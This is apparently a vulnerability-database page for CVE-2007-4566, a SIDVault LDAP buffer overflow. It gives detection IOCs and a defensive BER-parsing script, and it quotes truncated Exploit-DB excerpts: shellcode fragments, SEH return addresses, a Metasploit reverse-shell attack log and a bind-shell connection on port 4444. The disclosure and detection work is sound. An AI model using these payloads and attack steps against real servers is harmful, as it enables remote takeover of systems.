CVE-2007-4566
Published 2007-08-28
Priority: P3, 56
CVSS 2.0: 10 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available (see the Exploit-DB entries below)
EPSS: 15.33% (96.4th percentile)
Multiple buffer overflows in the login mechanism in sidvault in Alpha Centauri Software SIDVault LDAP Server before 2.0f allow remote attackers to execute arbitrary code via crafted LDAP packets, as demonstrated by a long dc entry in an LDAP bind.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alpha_centauri_software | sidvault_ldap_server | <= 2.0e | — |
Detection & IOCs (extracted from sources)
- SEH overwrite gadget: `\xE8\x15\xF3\xFF\xFF`, then 5 NOPs, then `\xEB\xF4\x90\x90`, then `\x29\x10\x40`
- Bytes: `30 82 10 2f 02 01 01 63 82 10 28 04 82 10 06 64 63 3d`
- Bytes: `30 82 12 10 02 01 01 60 82 12 09 02 01 03 04 82 10 fe 64 63 3d`
- Detect oversized LDAP bind requests with a 'dc=' attribute value exceeding normal length (>1024 bytes) on TCP port 389, indicative of buffer overflow exploitation against SIDVault.
- Look for LDAP BindRequest packets with a BER-encoded message length field of 0x1210 or 0x102f (unusually large) in the packet header, matching the crafted exploit packet structure.
- Detect LDAP simple bind requests where the DN field starts with 'dc=' followed by a payload of 1024+ bytes of repeated 0x41 ('A') characters, a classic junk buffer pattern used in all three exploit variants.
- Alert on LDAP bind requests where the password field is filled with 256 bytes of 0x42 ('B'), a consistent pattern across multiple exploit PoCs for this CVE.
- Monitor for outbound connections from the SIDVault process (sidvault.exe) to unexpected hosts, or new listening sockets on port 4444, which indicates successful shell_bind_tcp payload execution.
- Detect the SEH overwrite byte sequence 0xE8 0x18/0x15 0xF3 0xFF 0xFF followed shortly by 0xEB 0xF4 0x90 0x90 within an LDAP packet payload, indicating SEH-based exploitation.
- Flag use of the Metasploit module exploit/windows/ldap/sidvault_ldap in network or endpoint telemetry, including reverse TCP connections from the target on port 4444 back to the attacker.
- Caveat: the Linux exploit uses a hardcoded JMP ESP address from linux-gate.so (0xffffe777), which is VDSO-mapped and may vary across kernel versions; the Windows exploits use addresses specific to XP SP3 (Shell32.dll 0x7C96BF33) and sidvault.exe (0x401029).
- Caveat: the Windows SEH exploit targets SIDVault 2.0e specifically on Windows XP SP3; the universal ret address (0x401029 p/p/r from sidvault.exe) may not apply to other versions or OS configurations.
- Caveat: the Metasploit module enforces AlphanumUpper encoding and a stack adjustment of -3500 bytes; payloads not matching this encoding profile may fail, meaning detection rules relying on raw shellcode bytes may miss variants using different encoders.
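As an added defensive example (not code from this page, from SIDVault, or from any of the Exploit-DB entries), the following Python walks the BER structure of an LDAPMessage header and applies the length heuristics above, using the two byte IOCs quoted on this page plus one constructed benign bind as input. The 1024-byte `max_dn` threshold comes from the first detection item; the 16-byte prefix window is an assumption.

```python
def read_ber_length(buf, i):
    """Return (declared length, index after the length field) for the BER length at buf[i]."""
    if i >= len(buf):
        raise ValueError("truncated before length field")
    first = buf[i]
    if first < 0x80:                      # short form: one byte
        return first, i + 1
    n = first & 0x7F                      # long form: n following bytes hold the length
    if n == 0 or n > 4 or i + 1 + n > len(buf):
        raise ValueError("indefinite, oversized or truncated BER length")
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n

def parse_tlv(buf, i):
    """Return (tag, declared length, value start, value end) for the TLV at buf[i]."""
    if i >= len(buf):
        raise ValueError("truncated before tag")
    length, vstart = read_ber_length(buf, i + 1)
    return buf[i], length, vstart, vstart + length

def inspect_ldap_message(data, max_dn=1024):
    """Flag a BindRequest/SearchRequest whose DN is declared longer than max_dn.
    Works on a truncated capture: only the DN prefix actually present is read."""
    tag, msg_len, i, _ = parse_tlv(data, 0)
    if tag != 0x30:                       # LDAPMessage ::= SEQUENCE
        return None
    _, _, _, i = parse_tlv(data, i)       # messageID INTEGER, skipped
    op_tag, _, i, _ = parse_tlv(data, i)
    if op_tag == 0x60:                    # BindRequest [APPLICATION 0]
        _, _, _, i = parse_tlv(data, i)   # version INTEGER, skipped; name follows
        op = "bind"
    elif op_tag == 0x63:                  # SearchRequest [APPLICATION 3]
        op = "search"                     # baseObject is its first field
    else:
        return None
    dn_tag, dn_len, vs, ve = parse_tlv(data, i)
    if dn_tag != 0x04:                    # LDAPDN is an OCTET STRING
        return None
    dn_prefix = bytes(data[vs:min(ve, vs + 16, len(data))])  # 16-byte window (assumption)
    return {"op": op, "message_length": msg_len, "dn_length": dn_len,
            "dn_prefix": dn_prefix,
            "suspicious": dn_len > max_dn and dn_prefix.startswith(b"dc=")}

# Byte IOCs quoted on this page (headers only) plus one constructed benign bind.
CRAFTED_SEARCH = bytes.fromhex("30 82 10 2f 02 01 01 63 82 10 28 04 82 10 06 64 63 3d")
CRAFTED_BIND = bytes.fromhex("30 82 12 10 02 01 01 60 82 12 09 02 01 03 04 82 10 fe 64 63 3d")
BENIGN_BIND = bytes.fromhex("30 16 02 01 01 60 11 02 01 03 04 0a") + b"dc=example" + bytes.fromhex("80 00")
```

The declared DN length is visible within the first twenty bytes, so the rule fires before the junk buffer itself arrives; note that the 0x102f header carries the SearchRequest tag (0x63) rather than BindRequest (0x60), so a rule keyed only on BindRequest would miss that variant.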
No detection rules found.
Exploit-DB: SIDVault 2.0e - Windows Universal Buffer Overflow (SEH) (2009-09-09)
---
#!/usr/bin/python
import socket, sys, ldap
print "[*] SidVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)"
print "[*] Original author : blake"
print "[*] Seh Exploit : Skull-Hacker"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
Exploit-DB: SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit) (2009-09-04)
---
#--attack-log--
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree...
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)
#meterpreter >
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metaspl
Exploit-DB: SIDVault 2.0e - Windows Remote Buffer Overflow (2009-09-03)
---
#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys, ldap
print "\n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
shellcode = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49
Exploit-DB: SIDVault LDAP Server - Remote Buffer Overflow (2007-08-25)
---
#!/usr/bin/python
"""
Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)
"""
import sys
import socket
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x33\x4b\x4d\x43\x35"
sc += "\x43\x44\x43\x45\x4c\x56\x44\x30\x4c\x46\x48\x56\x4a\x45\x49\x49"
sc += "\x49\x38\x41\x4e\x4d\x4c\x42\x58\x48\x59\x43\x44\x44\x55\x48\x36"
sc += "\x4a\x36\x41\x31\x4e\x35\x48\x46\x43\x35\x49\x58\x41\x4e\x4c\x56"
sc += "\x48\x56\x4a\x55\x42\x45\x41\x5
No writeups or analysis indexed.
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065453.html
- http://secunia.com/advisories/26613
- http://securityreason.com/securityalert/3061
- http://www.securityfocus.com/archive/1/477821/100/0/threaded
- http://www.securityfocus.com/bid/25460
- http://www.securitytracker.com/id?1018612
- http://www.vupen.com/english/advisories/2007/2976
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36272